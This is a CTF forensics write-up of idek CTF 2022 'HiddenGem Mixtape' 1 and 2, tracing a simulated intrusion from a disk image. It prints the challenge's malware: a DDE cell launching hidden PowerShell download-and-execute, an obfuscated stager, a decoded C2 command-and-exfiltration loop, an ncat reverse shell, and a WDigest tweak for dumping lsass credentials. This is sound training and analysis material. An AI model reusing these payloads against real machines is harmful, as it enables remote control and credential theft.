idek CTF 2022* Forensics - HiddenGem Mixtape Writeup

This week is the Preliminary Eve in China, and most of my time is resting and partying. At the same time, there are some good challenges in idek CTF, among which I prefer the HiddenGem Mixtape series of challenges. Since I am a forensics enthusiast, and I I am also a malware analyst. So I prefer this challenge that is close to the realworld. Although some people may feel that this challenge is strange,guessing. Including some designs that may confuse the players. I hope my writeup can let you learn more much.Let’s gooooo

And a digression: szymex73 so strong! █Bquanman█ so strong!

HiddenGem Mixtape:

After downloading the file, we got three files 2023-01-07T194857_HiddenGem.zip,Note.txt,HiddenGem.7z

2023-01-07T194857_HiddenGem.zip after decompression is 2023-01-07T194857_HiddenGem.vhdx

Note.txt:

1
2
3
4
Note 1: All flags are wrapped in idek{} format, you don't need to do it yourself.
Note 2: The zip file is the same for all Mixtape.
HiddenGem.pcapng is mainly for `HiddenGem Mixtape 3: The Ultimate Goal` however it may contain data for the rest of HiddenGem Mixtape.
Note 3: Password for HiddenGem.pcapng will be released with Mixtape2 and 3

HiddenGem.7z needs a password, which is the traffic package. The password is 94cjFEJdMrZ&YI)s94cjFEJdMrZ&YI)s

HiddenGem Mixtape 1: Initial Access:

File 2023-01-07T194857_HiddenGem.vhdx and find that it is

1
2023-01-07T194857_HiddenGem.vhdx: Microsoft Disk Image eXtended, by .NET DiscUtils, sequence 0xe, NO Log Signature; region, 2 entries, id Metadata, at 0x200000, Required 1, id BAT, at 0x300000, Required 1

First, I found the vhdx I got, but it seems that the direct analysis of autopsy failed because it modified some offsets or erased some information, so I used Diskgeniu to open the disk file first, and then restore the file system. Then take the logicfiles of Autopsy for analysis, the approximate effect is as follows:

Email:

Since Initial Access is mentioned in the title description, it can be imagined that there may be some initial implants, and autopsy’s analysis indicates that there are email messages

After extraction, the mail information is as follows, with the attached Policy.7z and the password Privacy4411@2023!!!

Save it as 7z and decompress it with a password to get Policy.xlsx, continue to analyze the xlsx file

Policy.xlsx:

After decompression, it can be observed that there are some xlsx in it. After checking that there is no template injection and CVE, you can refer to whether there is DDE.
exists in xl\externalLinks\externalLink1.xml

1
2
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"><ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\&quot;http://172.21.20.96/windowsupdate.ps1\&quot;);IEX $e"><ddeItems><ddeItem name="_xlbgnm.A1" advise="1"/><ddeItem name="StdDocumentName" ole="1" advise="1"/></ddeItems></ddeLink></externalLink>

Specifically, you can know that the command cmd /c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://172.21.20.96/windowsupdate.ps1\");IEX $e The commands to run powershell hidden and get content from http://172.21.20.96/windowsupdate.ps1 and execute
from windowsupdate.ps1

you can also choose some online sandboxes to run and get the command

like any.run:

https://app.any.run/tasks/227c2a3f-8be3-443a-9a55-b4f5e8406e17

(toooo easy,right?)

Powershell:

Through the clues we found above http://172.21.20.96/windowsupdate.ps1, but this is a private ip that cannot be accessed, and then put it in autopsy to search, and found that there are some log information in the subsequent stage

Its log files are located under: C:/Windows/System32/winevt/logs/ Extract the Microsoft-Windows-Sysmon%4Operational.evtx log and load it with Event Log Explorer

You can get the follow-up payload from windowsupdate.ps1:

1
& ( $sHEllid[1]+$sheLLiD[13]+'X')( NEW-obJEct Io.cOMPReSSiON.DEFlAteStrEAM( [SyStem.iO.mEMOrySTream] [SysteM.cOnVerT]::FRomBase64STRINg( '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' ) , [sySteM.IO.ComprESsiON.cOmpresSiONMODe]::dEcomPrEss)|fOReach-OBJECt{NEW-obJEct iO.sTReAMrEAder( $_ , [TExT.EncOdiNg]::AscIi)} | fOREacH-obJeCt{$_.reADToend()})

The payload can be observed. According to the analysis experience of powershell malicious samples, we can get & ($sHellid[1]+$sheLLiD[13]+'X') represents iex, so we only need to turn it into echo and then run it Get the next stage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
(New-OBJECT MAnAGeMent.AUtOmaTiON.PsCreDEntIAL ' ', ('76492d1116743f0423413b160
50a5345MgB8AHUAQgAxAEsAZQBQAE8AUQA4AHQAVAB5ADEAcwBXAFYALwBVADcAUAAyAGcAPQA9AHwA
MQAzADcAMwAwAGIAOQA2ADMANQAwAGYAOABlADUAOQAxAGEAMgA4ADAAOQAzAGQAMABjADYAZgA2ADQ
AOAAxAGYAZAA4AGUAMAA2ADIANABmADQAMgAzADMAYwAxAGQANgA4ADEANgAwADcANgA1AGYANgBjAG
UAZQA1ADAAMwA4ADMAZQA5AGMAOQAzAGUAYgBhAGIANgA1ADEANQBjAGYAYwBiADIAOQA2ADcAYgA4A
GEAZAA3AGYANABhAGYAYgA2ADgANQAyADkAOAA1ADUAYQA2ADkAMwAzADMANwBkADIAOQA1ADkAZgBh
ADkANAA1AGYANwA1ADIAZAA2AGMAMgBhADYANQBjADAAYwA4AGEAYQA0AGYAZQBiAGUAYgA2AGQAOQA
4AGIAOAA1AGYAZAA1ADMANgBkADYANQBkADMAZQBiADAANQBjADkAMABmADMANQA0AGYAOQBiADMAMQ
A2ADkAOQAyADcAZgA2ADcAZgBiADAAYQAxAGYANAAzAGIAYQBjADQANwA2ADgAYwA4ADYAOAA2ADcAY
wA2ADAAZABkADkAOQAwADAAYgAzADYAMgA2ADUAZQA0AGYANAA2AGEAYgAwAGMAOAAwADAANQA4ADkA
NQBlAGYAYwBhADkANAAwADEANgBkADgAMwAzAGEAYQBlADMAMgAxAGEAMQBiADAAMwAwADQANQA1ADQ
AYQAzADIAYwA4AGQAZQBkADUAZABlAGIAMwA2ADgAYgA4AGYANAAyADUAZAAxADIAOAA0AGYANwA2AD
cAMABjADMAOAA1ADMAMwAyADkAZQA2AGEANwBmADAAZAA2ADUAMwBkADkAYgAzADcAMgA4ADEAZAA2A
GIANwAwADUAYwA0ADMAYQAwAGUAZgA0ADYAZQBiADkAYgA5ADcANQA5ADkAYQA0ADEAMgBhADQAYQA4
ADYAMQBhADIAYgA4ADcANwAzADIAMABjADIAMQA3ADgAYwA0ADIAYwA0ADYAZgAwAGIANQBmAGEAYQA
3AGIANQBlADMANgAwAGEANwAwAGMAMgBlADgAYQA5ADAAYwBlADkAMgBjADgAMgA3ADIAMAA4ADMANw
BiAGQANAA1AGYAOQBlADQANABkADkAMgBiADAAZQBiADgAYgA4ADQAZQA2AGQANgBlADAAYgA5ADcAN
QBhAGQAYQA2ADMAZgAwADcAMAA3ADcAYgA5AGYAYwAxADcANQBjADUANgAwAGMAZQA4ADYAZAA4ADkA
ZABhADgAOQA1AGQAMQA5AGEAMQAzADUANgAxADUAMAAyAGQANgA2AGMAZQBmAGQAYwBlADUAMABiADA
AYQA5ADIAOABlADMAZABkAGUANAAzADIAZgAwAGEANgA3ADkANQA3ADYANgA3ADIAOQBjAGUANgBkAD
QAZAAwAGUAZAAwADgAZAA5ADQANgBlADYAMwAyADIANQAyADkANABmADgAYwA5ADkAMAA0AGQAZgBkA
DEAYwAxAGUAOQAxADcAZgAyAGMANQBkAGYAMwAzADMANgBlAGEAZgBmAGMANgBjAGMAZABkAGQAMAA5
ADAAZQAzADQAZAAwADYAZAAyADUAMwA2AGMANgA2ADAANAAyADUANgA2ADUAYwA0ADQAZQAyADIAMgB
mADAANQAyAGEAYwA5ADAAZAAzADYAZAAzAGYAYQA2AGEAOAA0ADIAOQAwADAAMQAwAGYAOQBhADAAMw
BkAGYAMQBiAGMANgAwAGMAZAA4ADEANAA5AGEAMwAyAGQAOQBlADcANwBkADEAYQBiADUANQA0ADIAZ
ABhADQANwBmADAAYQA2ADYAMAAyADEANABmADAAMgAyAGEAMQAxAGQANgBjADgAOQA2ADYAYgA1AGQA
NQAwADIAMwBiADQANwAxADkAZgA5AGIANAA4AGQAYwAwADAANABiADIANgA2ADEAMwAwADIAYQA1ADI
AOQA2ADgAOQBmADgANgAwAGUAYwAyAGUANwAyAGUANAA1AGEAZABhAGEAMgA5ADQAZQAxAGUAMgA0AD
cAMQAzAGYANAAyADMAYQAzAGMAZgBlAGEANQA0ADQAYQBmADEAZAA1AGYANQBiADQANQA2ADgAZQBhA
GYAZQA4ADYAYgBhADgAMgBjADAAZQBjADIAMQAyADQAMgAyADAANAA4ADAAMAAyAGIAMgBiAGQANwBj
AGYAYQA3ADIAMABhAGMANgA1AGYAZgA4ADcAZQA2ADcANwA5AGQAMAA2AGEANgBlADkAZgA1AGIAOQA
0AGEAMwBiADAANgA4ADMAZAAwADQANQBkAGIAYwBmAGEANwBiADkAMAA1ADgAMABiAGYAYgA1AGEAMg
AxAGUAMQA0ADgANgAzADgAYQAwADcANQBlADUAYgA5AGUAYgAxADQANQA2AGQAYgAzADEAZgA0AGQAZ
QBiADMAZABlADIANQBiAGYANgA5AGUANQA5ADYAYgA4AGEAMgBjADcAYgA5ADUAOAAxAGMAZQAwADcA
ZAAzADQAMwA0ADIAMwA5ADMAYQAyADUAMQBkADUAYgBlADQANABmADgAMgBiADYAMgA3ADgAYgAxAGM
AMQBhAGMANQAyAGQANgBlADcANAA1AGYANAA5ADMAMAA5ADcANwBkAGIAMwA0AGUAYQBjADEANwAwAG
UAZQBhADEAZQAzADUAZAA0ADIAYQBjADAAMQA2ADYAOABlADQAMAAxADcANwA4AGUAZABjADgAZAA5A
GIAZQA0ADcANgBmADAANwBiADgAOAA4ADIAYgA4AGIAYwA2ADgAZQA3ADgAYQA2AGQAMwAzAGMAZQBl
AGUANQAzADIAZQBkAGMAYQBhADkANwBhAGEAOAAwADEAZgA0ADEAMwAxADAAYwA2AGEAZgBmAGMAZgB
lADEAYQA5ADcAOAAxADEAOQAwADEAYwBkADIAOQAwAGYANgBhADkAYwBlAGQAYQBmADYAYwBmADYAOA
A1ADMAMAAxADQANgA2ADUAZABhADMAYgAwADEAZQAwADgAMwAxADMAMgA5ADYAOQA1AGYANAAwADgAO
ABjAGYANABmAGEAMgAxADQAZQA3ADUAMgA2ADQAOABhAGMAYgBlADAAYgA2ADcAYwAyAGMAOQA0AGIA
MwBlAGIANAAxADkAMwAyAGIAZQBhADMANQA4AGUAOQBkAGQANQA3AGUAYgAyADcAZABmADQAZQBiADQ
AOQBmADQAMAA5AGEAOABhADYAOABhAGIAZQBlADAAYQA2ADUAZgA3ADEANQBkADIANABiADcAYwAxAG
IANQAwADgAZQBlAGUAMQBjAGEANAA1ADYAMgBiAGYAMwA4ADAAMwBiADIAZgAwADAAYQAxADEAOAAwA
DQAYgA3ADcAMwBhADEANABkAGQANQA1ADQAZgA1AGMAMAA5ADQAOQA0ADAAZgA3AGIAMwA3AGIAMwAx
ADAAZQBjADQAYQA3ADYAMQBkADQAOQA3AGEAOABiAGYAZgBhAGMAZQAyADAAMgA3ADIAOQAxADIAZgB
hADQAYwBhADkAYwA4ADAANwA0ADUANwAyADgAZQAzADUAMQBlADIAMgA1ADYAMAAwADAAOAAyAGIAYQ
A4AGYAZQBiAGEAMAA3AGYAMgBjAGIANgBkAGMAZgAxAGIAYgA4ADEAMgA4ADAANQA3ADMANAA3ADcAO
QA5AGUANQA2ADUAMQAwAGQANAA1AGYANQAyAGQAYwBiADUAZgAzADgAMABmADIANwAxAGMAZQBhAGYA
OABiADUANQBiAGQAZgBkAGMAMABjAGIANwBjADAANAA5AGYAZABkADAAMgAwADAAYwA5ADcAYwA3ADQ
ANwBkADQAYgAwAGYAZABkAGYAMwAzADUAZQAwADgAZAAyADIAYQA4ADQAOQBlADgAZgBjAGMAMgAzAD
cANAAyADcAZgBhADMAZgA4ADUAMgBhADAANQAxADkAYgAyAGQAYwBjADQAOQA1ADUANwAwADUAYgA0A
DgAOQBkADEAYwAzADgAMAA3ADUAOAA5AGEAYQBiADYAZQA5ADEAYQAxADMAMgBkADYAZAA5ADYAMQAz
AGQAZAA2AGYANQAyAGQANgA1ADIAMAA5ADUAYgA2AGEAZQBjADkAMQBhAGIANQAyADUAMwA5ADQAMAA
yADUAOQA0ADgAZgBmADgANAAwADYAMwBmAGIAMAA4AGQAZgA0ADUAYwAyAGQAOQAwADYANgA5ADkAOA
BiAGYANAA1ADYAMQAyADUANQA1ADAAYwAzADUAYgAwAGQAMgA0ADUAZAA0AGUAYwAyAGYAMABkADAAO
AA1ADgAYgA0ADcANAA1ADIAMAAwADIANwBlADYAYgA2ADUAOABlADMAYgA3ADYAYgBmAGQANQA2ADYA
ZAAyADYAYwA4ADcANQAzADcAOABjAGMAMQBlADQANABmAGUAOQBhADUAYQBlADkAZABkAGMANQA2ADA
AMQBmADYAMAAxADEAOQA3AGIAYwBiAGUANwA2ADIAZAA4ADkAYQA4AGEAMgBlAGQAMgA4ADQANAA4AD
cANAA4AGEAYgA0AGIAMgA5ADgAOQBhAGUAMQAzADUAMwBkADMAMAA5ADMANQA1ADMAMQAyADEAYQBhA
DkAOAA2ADgAOQBlAGEANwA2ADIANAA3ADgAOQAzAGEAYwA0ADkAYgBhAGMAMwBmAGQAZABiADYAZgA3
ADAAZABkADIAMQA3ADAAYQA4ADQAOQBlADYANgAxADkAYQA3ADMAMgA0ADgAOQA2ADcAOQBkADEAYQB
mAGYANwAzADcAYgA0ADAANgAzADgAZAA1AGYAZgBkADgAOQBjAGIAZgA4ADYAOAAwADcAOQBkADYAMA
AxADYAMgBmADcANAAwAGUAOAA4ADYANQAzAGYAMwA5ADMAZQAxADYAMgBmADIAZABjAGEAMAA3ADIAM
AA1AGQAYQA5AGYAOABkADMAZAA2AGYAMgAxAGQAYwA0ADAAMgAwADMANQA4AGUAYQBiADYAMQBlAGQA
MAA3ADcAYQBlADgAOQBiADEANQA1ADQAZAA1ADgAMQA3ADQAMwBjAGYANQAxAGUAMQAyAGIAZQBjADI
AYgBmADIAZgBlADUANAA3ADQAYQA5ADAANwBjADQANgA0AGEAYQAwADMAZAA0AGEAZQA1AGMAZgAzAG
MAYgBlAGEAZQA2ADQAMABiADQAMQBhAGEAZQA5ADcAYwAxADAAZQBiADYAMQAyAGMANQAwADUAMQBiA
GQAMQBkADUANAAwADQAZQA1AGMANQAzAGUAOAA3ADYAYwA3AGUANwBjADQAZgAzAGMANwAyADgANwA1
ADQAOQBhADIAMwA1ADUAMgA2ADAANgA1ADYANwAwADcAMgBiAGUAYwA0ADYAOQA5ADQANgA5AGUAYgA
0ADQAMQBjADUAYwA4AGQAMgBjAGIAYQAxADIAMwA3ADYAYQBlAGUAZgA0ADIANgBlAGMAZgA0AGIANQ
A3ADcAOAAyAGEAYwA2ADMAZQBiADcANgAxADgANABiADcAMgA5ADAAMgA2ADkAZgBlAGEANQBjADgAZ
gA4AGEAYwBjAGIAMgBkAGYANAA4AGQAOABmADkANgBjAGIAOQA4AGUAOQBjAGMAMwA3ADcAYwAyAGQA
ZQA2ADQAMwBkADYAMQA5AGIANwAyADYAZQA5ADcAYQA5ADQANQBkADEANgA0AGQANAA2AGQAZQBlADA
AZgBlADUAMAAzADkAYwBlAGYAZgBhADQANwA1AGEAMQBkADMAOAA1ADkAMAA1AGIAMAAyADIAMQA1AD
EAOQA2AGUAYgA0AGUAOAA1ADYAYgA4ADEAMAA1ADAAYQBlAGUAMgBlADYAYwBkAGEANQBiAGUANwAzA
DMAZAA1ADAAZgBjADYAMwA5AGEANABlADEAMABmADUAMwA2ADgANQBjADUAYgA5AGIAYQA3AGEAMwA1
ADkANgBlADAAMgBiADYAZQA5AGEANgA0ADAAMAA0ADYAOABkAGMAMQAwADIAYwAzADgAOAAzAGIAMQB
iADgAZgA1ADUAYQBmADIAZgBkAGMANAAzAGIANgA4AGUAOQBiADgANQBmADIAMAA5AGMAZAA1ADUAYg
AyAGMAMwA4AGEAZABiADgAOAAwAGYANQBkADQAZgAzADkAYgA4AGYAOAA3ADIAYwAwAGUAMgAyADYAZ
gAzADUAOQAzADgANQA3ADYAYwAyADAANQBlADEANwBlADEAZgBjADQAOAAwAGUAZQAyADIANABhADUA
NwA4ADQAMwBiADIAZAA3ADYAYQBkADUANABhAGIAMwA1ADgANgA1AGYAYwAzAGEAYwA1ADAAMQA2ADg
AZABlADMAYQA1AGEANwAxADQAMgBkAGQAZQA4AGMANwA5ADcAYgAzADUANwA3AGYAMgA5ADYAMgBlAD
cAOQA3AGUAYgBmAGUAMgBiAGIAMwA0ADkAOQAyADcAMwBlADgAZQBmADMAOAAxADUAMwA1ADcANABiA
DMAMABmADkAMgA3AGMAOAA5AGMANABlAGQAZQA3AGIAYQA2AGYANABkADAAMgBiADYAMgAyADQAZABl
AGYANwBhADQAMAAxADMAYgBjADMAYwBjADkAZQBhADcANgBhADMAOAA0AGYAMwAwAGYAOQBmADUAOAB
lADgAZAAwADgANAAzADAANABlAGEAMwAyAGMAZAAzADgAYgA2ADUAMgBmAGQAMwBjADgANwBhADkAMw
AxAGUAMABiADQAMwAzAGIAOAA1AGUAMwAzADEAYgBlAGMAMQBiAGYAYgBmAGIANAAzAGUANwBjAGMAM
wAxADMAYwAwAGYAMQBlADAAZgBmAGEAOAAyADEANgA4ADgAMwA3ADMANgA5AGQAMgA2AGEAZAA1ADYA
YwBmAGYANgAxADAAOAA3AGQAMwAyADYAMQBlADgAMgAzAGMAOAAxADkAMwBhADYANwA3ADcAYQA3ADM
AYgAwAGMAMAA2AGEANwBiAGMAZABmADIAZQBjADUAYwAxADYAMABhAGUANQBlADAAZgA2ADMAOAA3AD
EANgA0ADEAOAA1ADUAMgAzADUAYQA5ADMANQA0AGMAOABiADAAMgAwAGQAMgAyAGIANQBmADQAOQBhA
DQAYQAwADMAZAAxADkAMwAyADQAYgBkADUAMwAzADAANAAxADMAMwAxAGYANwAzADYAMgA1AGYAYwBh
AGIAMQA2ADYANgBjAGQANgAwAGIANABkADYAOABhAGQAMQAzADEAMAA4AGYAYwBhAGUAOAA0ADYAYQA
yAGMAOAA1AGUAMQA3ADgAOABiAGYANwBjAGMAZQAyADcAZgA1ADAAZQBiAGQAYQAwAGQAOAAyADQANA
BjADIAYQA4ADMAYQBkADIAOAAxAGUANgBiADMANABlADMAZABiADMAMQA1ADcANABjADEAZQBjAGUAZ
AAyAGIAMgA4ADEAYwBiADgAMgAwAGEAZgAzADUANgAyAGYAMwA3ADIANABmADkAOAA5ADcANwBiADUA
NQAzAGYAMgA=' |ConvERTtO-SecureSTRiNG -k 55,113,158,254,51,94,175,13,94,42,226,
159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93)).Getn
eTwoRKCrEDEnTIAl().pASsWoRD |. ( $PsHoME[21]+$psHOme[34]+'x')

here .($PsHoME[21]+$psHOme[34]+'x') is IEX, replace it with Out-String and run again, then you can get the decryption and format it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$bwqvRnHz99 = (104,116,116,112,115,58,47,47,112,97,115,116,101);
$bwqvRnHz99 += (98,105,110,46,99,111,109,47,104,86,67,69,85,75,49,66);
$flag = [System.Text.Encoding]::ASCII.GetString($bwqvRnHz99);
$s='172.21.20.96:8080';
$i='eef8efac-321d465e-e9d053a7';
$p='http://';
$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/eef8efac -Headers @{
X-680d-47e8"=$i
};while ($true){
$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/321d465e -Headers @{
"X-680d-47e8"=$i}
).Content;
if ($c -ne 'None') {
$r=iex $c -ErrorAction Stop -ErrorVariable e;
$r=Out-String -InputObject $r;
$t=Invoke-WebRequest -Uri $p$s/e9d053a7 -Method POST -Headers @{
"X-680d-47e8"=$i
} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')
}
sleep 0.8
}

flag1:

Observe the part where the flag exists
Run that piece of code to get https://pastebin.com/hVCEUK1B to visit again:

1
2
3
4
5
6
7
8
PS $bwqvRnHz99 = (104,116,116,112,115,58,47,47,112,97,115,116,101);
PS $bwqvRnHz99 += (98,105,110,46,99,111,109,47,104,86,67,69,85,75,49,66);
PS $flag = [System.Text.Encoding]::ASCII.GetString($bwqvRnHz99)
PS $flag
https://pastebin.com/hVCEUK1B

idek{MS_ExCel_DyN4m1c_D4ta_ExcH@ng3_1s_3a5y_t0_d3teCt}
Resource: https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within

then You can get the flag –> idek{MS_ExCel_DyN4m1c_D4ta_ExcH@ng3_1s_3a5y_t0_d3teCt}

HiddenGem Mixtape 2: Credential Access:

According to the above clues, we already know some news, including http://172.21.20.96/windowsupdate.ps1
However, in the subsequent log retrieval, I did not find the payload after interacting with 172.21.20.96:8080, but the information exists in C:/Windows/System32/winevt/logs/Microsoft-Windows-Sysmon%4Operational.evtx
Retrieve the log to locate a specific statement

It can be seen that the parent process is EXCEL.exe and its child process is cmd.exe, and the child process of cmd is the command of powershell, which conforms to the example of running powershell with xlsx and DDE described above. After accepting the relevant configuration of C2, C2 uploaded an ncat to C:\Users\IEUser\AppData\Local\Temp\SecurityUpdate.exe of the target machine, and passed the command "C:\Users\IEUser\AppData\Local\ Temp\SecurityUpdate.exe" 172.21.20.96 4444 -e cmd.exe to reverse shell

execute shell (cmd.exe)

Ncat:

Continuing to search upwards, we found that the cmd as the main process executed some commands to detect or collect some relevant credentials

Execute whoami:

Execute arp -a:

Execute ipconfig /all:

Execute REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 to prepare for dump lsass

Afterwards, UpdateAgent.exe (procdump) and mimikatz.exe should be uploaded to C:\Windows\System32\ through powershell, but I didn’t find the local related logs. If anyone finds them, please let me know.

procdump && mimikatz:

